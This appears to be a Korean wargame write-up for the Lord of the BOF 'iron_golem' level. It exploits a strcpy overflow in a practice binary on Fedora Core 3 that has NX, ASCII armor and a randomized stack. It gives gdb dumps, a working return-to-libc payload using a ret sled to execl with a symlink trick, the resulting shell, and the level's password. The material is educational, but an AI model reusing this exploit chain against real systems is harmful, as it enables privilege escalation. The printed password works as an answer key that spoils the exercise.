[LOB_FC3] gate ->iron_golem

#Env 

- NX

- ascii armor

- random stack

#Technic

- &ret sled로 RTL 인자 구성

iron_golem.c 소스

[gate@Fedora_1stFloor ~]$ cat iron_golem.c /* The Lord of the BOF : The Fellowship of the BOF - iron_golem - Local BOF on Fedora Core 3 - hint : fake ebp */ int main(int argc, char *argv[]) { char buffer[256]; if(argc < 2){ printf("argv error\n"); exit(0); } strcpy(buffer, argv[1]); printf("%s\n", buffer); }

1] 기본 정보 확인

- stack에 'X'비트 확인

[gate@Fedora_1stFloor ~]$ readelf -l iron_golem | grep STACK

  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x4

- Ascii Armor 확인

[gate@Fedora_1stFloor ~]$ ldd iron_golem

        libc.so.6 => /lib/tls/libc.so.6 (0x0071c000)

        /lib/ld-linux.so.2 (0x00703000)

=> 취약점은 strcpy에서 일어나며 stack에 실행 권한이 없으며  ascii armor가 있다.

---

2] payload 작성

(gdb) r `perl -e 'print "a"x264'`

The program being debugged has been started already.

Start it from the beginning? (y or n) y

Starting program: /home/gate/iron_golem `perl -e 'print "a"x264'`

(no debugging symbols found)...(no debugging symbols found)...

Breakpoint 1, 0x08048426 in main ()

(gdb) x/10x $ebp-0x20

0xfefa29d8:     0x61616161      0x61616161      0x61616161      0x61616161

0xfefa29e8:     0x61616161      0x61616161      0x61616161      0x61616161

0xfefa29f8:     0xfefa2a00      0x00730e33

(gdb) x/4x $ebp

0xfefa29f8:     0xfefa2a00      0x00730e33      0x00000002      0xfefa2a84

(gdb)

=> |   264 buf   |   ebp   |   ret   |

랜덤 스택이지만 고정적인 스택의 데이터를 이용해서 execl의 인자값으로 사용한다. (&ret sled이용)

(gdb) x/20x $ebp

0xfefe1128:     0xfefe1188      0x00730e33      0x00000002      0xfefe11b4

0xfefe1138:     0xfefe11c0      0x0070eab6      0x0083eff4      0x00000000

0xfefe1148:     0xfefe1140      0xfefe1188      0xfefe1130      0x00730df5

0xfefe1158:     0x00000000      0x00000000      0x00000000      0x00718fb4

0xfefe1168:     0x00000002      0x08048328      0x00000000      0x0070e9f0

(gdb) r

The program being debugged has been started already.

Start it from the beginning? (y or n) y

Starting program: /home/gate/iron_golem abcd

(no debugging symbols found)...(no debugging symbols found)...

Breakpoint 1, 0x08048426 in main ()

(gdb) x/20x $ebp

0xfee0d3e8:     0xfee0d448      0x00730e33      0x00000002      0xfee0d474

0xfee0d3f8:     0xfee0d480      0x0070eab6      0x0083eff4      0x00000000

0xfee0d408:     0xfee0d400      0xfee0d448      0xfee0d3f0      0x00730df5

0xfee0d418:     0x00000000      0x00000000      0x00000000      0x00718fb4

0xfee0d428:     0x00000002      0x08048328      0x00000000      0x0070e9f0

(gdb) p execl

$1 = {<text variable, no debug info>} 0x7a5720 <execl>

(gdb) x/i main+113

0x8048441 <main+113>:   ret

=> 

&ret = 0x8048441 

&execl = 0x7a5720

execl(0x0070eab6, 0x0083eff4, 0x00000000)

payload : |   264 buf   |   ebp   |   &ret x 2 | &execl | dummy(4) | 0x0070eab6, 0x0083eff4, 0x00000000 ...... 

0x0070eab6가 execl로 실행할 파일 이름이 되므로 쉘을 띄우는 프로그램에 심볼릭 링크를 설정하면 된다.

ln -s a.out  "`perl -e' print "\x8b\x55\xf0\x83\xec\x14\x89\xc1\x31\xc0\x85\xd2\x74\x0b\x85\xc9\x74\x4c\x8b\x42\x04\x8b\x31\x01\xf0\x8b\xbb\xf8\xfc\xff\xff\x85\xff\x75\x05\x8b\x4d\xe4\x89\x01\x8d\x65\xf4\x5b\x5e\x5f\x5d\xc3\x8b\x4d\xe8\x8b\x40\x04\x0f\xb7\x04\x48\x8b\x8e\x88\x01"'`"

공격코드 : "`perl -e 'print "a"x264, "bbbb", "\x41\x84\x04\x08"x2, "\x20\x57\x7a\x00"'`"

[gate@Fedora_1stFloor ~]$ ./iron_golem  "`perl -e 'print "a"x264, "bbbb", "\x41\x84\x04\x08"x2, "\x20\x57\x7a\x00"'`"

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbAA Wz

sh-3.00$ id

uid=501(iron_golem) gid=501(iron_golem) groups=500(gate) context=user_u:system_r:unconfined_t

sh-3.00$ my-pass

euid = 501

blood on the fedora